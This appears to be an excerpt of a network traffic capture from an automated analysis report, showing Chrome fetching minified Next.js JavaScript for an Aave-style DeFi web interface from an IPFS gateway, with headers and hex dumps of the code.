                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 1864710
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeibilt22avmfjggtmjz3el2khnv5d4rpyvcrfuds623d2oibz4wleq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/_app-c0d18763a38243f4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafybeibilt22avmfjggtmjz3el2khnv5d4rpyvcrfuds623d2oibz4wleq
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC137INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 64 63 31 33 2d 30 32 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 39 38 37 35 31 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 62 37 66 65 38 38 63 35 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-dc13-02CF-Cache-Status: HITAge: 98751Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43b7fe88c5d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 32 30 38 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 36 34 31 34 36 29 2c 61 3d 6e 28 38 31 39 38 29 3b 63 6f 6e 73 74 20 69 3d 5b 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 73 74 6b 41 61 76 65 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",na
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 72 69 63 65 55 73 64 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 41 70 79 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 31 32 38 22 2c 6e 61 6d 65 3a 22 64 69 73 74 72 69 62 75 74 69 6f 6e 50 65 72 53 65 63 6f 6e 64 22 2c 74 79 70 65 3a 22 75 69 6e 74 31 32 38 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 62 6f 6f 6c 22 2c 6e 61 6d 65 3a 22 69 6e 50 6f 73 74 53 6c 61 73 68 69 6e 67 50 65 72 69 6f 64 22 2c 74 79 70 65 3a 22 62 6f 6f 6c 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 64 69 73 74 72 69 62 75 74 69 6f 6e 45
                                                                                                                                                                                                                                                  Data Ascii: riceUsd",type:"uint256"},{internalType:"uint256",name:"stakeApy",type:"uint256"},{internalType:"uint128",name:"distributionPerSecond",type:"uint128"},{internalType:"bool",name:"inPostSlashingPeriod",type:"bool"},{internalType:"uint256",name:"distributionE
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 72 63 65 6e 74 61 67 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 73 74 72 75 63 74 20 49 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 50 72 6f 76 69 64 65 72 2e 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 5b 5d 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 74 75 70 6c 65 5b 5d 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 3a 22 76 69 65 77 22 2c 74 79 70 65 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 64 41 73 73 65
                                                                                                                                                                                                                                                  Data Ascii: ercentage",type:"uint256"}],internalType:"struct IStakedTokenDataProvider.StakedTokenData[]",name:"",type:"tuple[]"},{internalType:"uint256",name:"",type:"uint256"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsse
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 64 54 6f 6b 65 6e 52 65 64 65 65 6d 61 62 6c 65 41 6d 6f 75 6e 74 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 75 6e 64 65 72 6c 79 69 6e 67 54 6f 6b 65 6e 55 73 65 72 42 61 6c 61 6e 63 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 72 65 77 61 72 64 73 54 6f 43 6c 61 69 6d 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 34 30 22 2c 6e 61 6d 65 3a 22 75 73 65 72 43 6f 6f 6c 64 6f 77 6e 54 69 6d 65 73 74 61 6d 70 22 2c 74 79 70 65 3a 22 75 69 6e 74 34 30 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79
                                                                                                                                                                                                                                                  Data Ascii: edTokenRedeemableAmount",type:"uint256"},{internalType:"uint256",name:"underlyingTokenUserBalance",type:"uint256"},{internalType:"uint256",name:"rewardsToClaim",type:"uint256"},{internalType:"uint40",name:"userCooldownTimestamp",type:"uint40"},{internalTy
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 2c 6e 61 6d 65 3a 22 6d 61 78 53 6c 61 73 68 61 62 6c 65 50 65 72 63 65 6e 74 61 67 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 73 74 72 75 63 74 20 49 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 50 72 6f 76 69 64 65 72 2e 53 74 61 6b 65 64 54 6f 6b 65 6e 44 61 74 61 5b 5d 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 74 75 70 6c 65 5b 5d 22 7d 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65 64 54 6f 6b 65 6e 55 73 65 72 42 61 6c 61 6e 63 65 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 73 74 61 6b 65
                                                                                                                                                                                                                                                  Data Ascii: ,name:"maxSlashablePercentage",type:"uint256"}],internalType:"struct IStakedTokenDataProvider.StakedTokenData[]",name:"",type:"tuple[]"},{components:[{internalType:"uint256",name:"stakedTokenUserBalance",type:"uint256"},{internalType:"uint256",name:"stake
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 73 74 61 6d 70 3a 65 2e 75 73 65 72 43 6f 6f 6c 64 6f 77 6e 54 69 6d 65 73 74 61 6d 70 2c 75 73 65 72 49 6e 63 65 6e 74 69 76 65 73 54 6f 43 6c 61 69 6d 3a 65 2e 72 65 77 61 72 64 73 54 6f 43 6c 61 69 6d 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 29 29 2c 65 74 68 50 72 69 63 65 55 73 64 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 7d 7d 61 73 79 6e 63 20 67 65 74 53 74 61 6b 65 64 41 73 73 65 74 44 61 74 61 42 61 74 63 68 28 65 2c 74 29 7b 63 6f 6e 73 74 5b 6e 2c 72 5d 3d 61 77 61 69 74 20 74 68 69 73 2e 5f 63 6f 6e 74 72 61 63 74 2e 67 65 74 53 74 61 6b 65 64 41 73 73 65 74 44 61 74 61 42 61 74 63 68 28 65 2c 74 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 28 65 3d 3e 28 7b 69 6e 50 6f 73 74 53 6c 61 73 68 69 6e 67 50
                                                                                                                                                                                                                                                  Data Ascii: estamp:e.userCooldownTimestamp,userIncentivesToClaim:e.rewardsToClaim.toString()}))),ethPriceUsd:a.toString()}}async getStakedAssetDataBatch(e,t){const[n,r]=await this._contract.getStakedAssetDataBatch(e,t),a=function(e){return e.map((e=>({inPostSlashingP
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 74 69 6f 6e 22 7d 2c 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 66 72 6f 6d 55 73 65 72 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 74 6f 55 73 65 72 22 2c 74 79 70 65 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 6e 61 6d 65 3a 22 62 6f 72 72 6f 77 41 6c 6c 6f 77 61 6e 63 65 22 2c 6f 75 74 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 75 69 6e 74 32 35 36 22 2c 6e 61 6d 65 3a 22 22 2c 74 79 70 65 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 3a 22 76 69 65 77 22 2c 74 79 70 65 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 5d 3b 63 6c 61 73 73 20
                                                                                                                                                                                                                                                  Data Ascii: tion"},{inputs:[{internalType:"address",name:"fromUser",type:"address"},{internalType:"address",name:"toUser",type:"address"}],name:"borrowAllowance",outputs:[{internalType:"uint256",name:"",type:"uint256"}],stateMutability:"view",type:"function"}];class
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 74 75 72 6e 20 75 2e 67 74 65 28 6c 29 7d 7d 28 30 2c 72 2e 5f 5f 64 65 63 6f 72 61 74 65 29 28 5b 75 2e 45 42 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 75 73 65 72 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 64 65 6c 65 67 61 74 65 65 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4f 68 29 28 22 64 65 62 74 54 6f 6b 65 6e 41 64 64 72 65 73 73 22 29 29 2c 28 30 2c 72 2e 5f 5f 70 61 72 61 6d 29 28 30 2c 28 30 2c 6c 2e 4b 35 29 28 22 61 6d 6f 75 6e 74 22 29 29 2c 28 30 2c 72 2e 5f 5f 6d 65 74 61 64 61 74 61 29 28 22 64 65 73 69 67 6e 3a 74 79 70 65 22 2c 46 75 6e 63 74 69 6f 6e 29 2c 28 30 2c 72 2e 5f 5f 6d 65 74 61 64 61 74 61 29 28 22 64 65 73
                                                                                                                                                                                                                                                  Data Ascii: turn u.gte(l)}}(0,r.__decorate)([u.EB,(0,r.__param)(0,(0,l.Oh)("user")),(0,r.__param)(0,(0,l.Oh)("delegatee")),(0,r.__param)(0,(0,l.Oh)("debtTokenAddress")),(0,r.__param)(0,(0,l.K5)("amount")),(0,r.__metadata)("design:type",Function),(0,r.__metadata)("des
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 22 2c 50 72 6f 6d 69 73 65 29 5d 2c 6d 2e 70 72 6f 74 6f 74 79 70 65 2c 22 69 73 44 65 6c 65 67 61 74 69 6f 6e 41 70 70 72 6f 76 65 64 22 2c 6e 75 6c 6c 29 7d 2c 36 36 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 61 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 61 7d 2c 6b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6b 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 36 33 37 31 29 2c 61 3d 6e 28 36 34 31 34 36 29 3b 63 6f 6e 73 74 20 69 3d 5b 7b 69 6e 70 75 74 73 3a 5b 7b 69 6e 74 65 72 6e 61 6c 54 79 70 65 3a 22 61 64 64 72 65 73 73 22 2c 6e 61 6d 65 3a 22 62 61 73 65 22 2c
                                                                                                                                                                                                                                                  Data Ascii: e",Promise)],m.prototype,"isDelegationApproved",null)},66215:function(e,t,n){"use strict";n.d(t,{Z0:function(){return s},ar:function(){return o.a},kX:function(){return o.k}});var r=n(56371),a=n(64146);const i=[{inputs:[{internalType:"address",name:"base",


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  99192.168.2.549819209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC504OUTGET /_next/static/chunks/4284-bbf96c7bcf282a59.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13036
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidmhbwmoen2dm76enqpnzshlj6ozuvolwgbyrp4mf2yfvqemgjwse"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4284-bbf96c7bcf282a59.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidmhbwmoen2dm76enqpnzshlj6ozuvolwgbyrp4mf2yfvqemgjwse
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028482
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 63 34 38 31 32 31 61 32 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43c48121a2c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 32 38 34 5d 2c 7b 35 30 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 39 31 36 35 35 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 32 39 36 33 30 29 2c 63 3d 28 72 28 36 37 32 39 34 29 2c 72 28 37 33 39 36 35 29 29 2c 6c 3d 72 28 34 31 30 32 34 29 2c 64 3d 72 28 38 35 38 39 33 29 2c 70 3d 5b 22 6d 69 6e 56 61 6c 22 2c 22 6d 61 78 56 61 6c 22 2c 22 70 65 72 63 65 6e 74 56 61 72 69 61 6e 74 22 2c 22 68 79 70 68 65 6e 56 61 72 69 61 6e 74 22 5d
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),a=r(30120),s=r(29630),c=(r(67294),r(73965)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"]
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 6c 75 65 3a 76 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 68 29 29 3a 28 30 2c 64 2e 6a 73 78 73 29 28 64 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 6c 2e 42 2c 78 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 76 61 6c 75 65 3a 31 30 30 2a 76 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 74 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 2d 67 68 6f 2d 66
                                                                                                                                                                                                                                                  Data Ascii: x({compact:!0,percent:!0,value:v,visibleDecimals:2,variant:null!==t&&void 0!==t?t:"h3","data-cy":"apy"},h)):(0,d.jsxs)(d.Fragment,{children:[(0,d.jsx)(l.B,x({compact:!0,value:100*v,visibleDecimals:2,variant:null!==t&&void 0!==t?t:"h3","data-cy":"apy-gho-f
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 63 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 63 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 63 6f 6c 6f 72 3a 22 64 61 72 6b 22 3d 3d 3d 78 3f 22 23 41 35 41 38 42 36 22 3a 22 23 36 32 36 37 37 42 22 7d 2c 76 61 72 69 61 6e 74 3a 76 3f 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 63 61 70 74 69 6f 6e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 22 64 69 76 22 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 2c 6c 26 26 6c 5d 7d 29 2c 66 3f 28 30 2c 63 2e 6a 73 78 29 28 73 2e 5a 2c 7b 77 69 64 74 68
                                                                                                                                                                                                                                                  Data Ascii: exDirection:"column"},children:[(0,c.jsxs)(i.Z,{sx:{display:"inline-flex",alignItems:"center"},children:[(0,c.jsx)(a.Z,{sx:{color:"dark"===x?"#A5A8B6":"#62677B"},variant:v?"description":"caption",component:"div",children:r}),l&&l]}),f?(0,c.jsx)(s.Z,{width
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 61 73 73 65 74 20 69 73 20 70 6c 61 6e 6e 65 64 20 74 6f 20 62 65 20 6f 66 66 62 6f 61 72 64 65 64 20 64 75 65 20 74 6f 20 61 6e 20 41 61 76 65 20 50 72 6f 74 6f 63 6f 6c 20 47 6f 76 65 72 6e 61 6e 63 65 20 64 65 63 69 73 69 6f 6e 2e 20 3c 30 3e 4d 6f 72 65 20 64 65 74 61 69 6c 73 3c 2f 30 3e 22 2c 63 6f 6d 70 6f 6e 65 6e 74 73 3a 7b 30 3a 28 30 2c 73 2e 6a 73 78 29 28 61 2e 72 55 2c 7b 68 72 65 66 3a 6e 2c 73 78 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 7d 29 7d 7d 29 7d 7d 2c 31 32 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76
                                                                                                                                                                                                                                                  Data Ascii: (0,s.jsx)(o.cC,{id:"This asset is planned to be offboarded due to an Aave Protocol Governance decision. <0>More details</0>",components:{0:(0,s.jsx)(a.rU,{href:n,sx:{textDecoration:"underline"}})}})}},1252:function(e,n,r){r.d(n,{O:function(){return i}});v
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 5f 68 61 72 6d 6f 6e 79 5f 76 33 22 3d 3d 3d 6e 3f 22 68 74 74 70 73 3a 2f 2f 73 6e 61 70 73 68 6f 74 2e 6f 72 67 2f 23 2f 61 61 76 65 2e 65 74 68 2f 70 72 6f 70 6f 73 61 6c 2f 30 78 38 31 61 37 38 31 30 39 39 34 31 65 35 65 30 61 63 36 63 62 35 65 62 66 38 32 35 39 37 63 38 33 39 63 32 30 61 64 36 38 32 31 61 38 63 33 66 66 30 36 33 64 62 61 33 39 30 33 32 35 33 33 64 34 22 3a 6e 26 26 22 70 72 6f 74 6f 5f 66 61 6e 74 6f 6d 5f 76 33 22 3d 3d 3d 6e 3f 22 68 74 74 70 73 3a 2f 2f 73 6e 61 70 73 68 6f 74 2e 6f 72 67 2f 23 2f 61 61 76 65 2e 65 74 68 2f 70 72 6f 70 6f 73 61 6c 2f 30 78 65 65 66 63 64 37 36 65 35 32 33 33 39 31 61 31 34 63 66 64 30 61 37 39 62 35 33 31 65 61 30 61 33 66 61 66 30 65 62 34 61 30 35 38 65 32 35 35 66 61 63 31 33 61 32 64 32 32 34
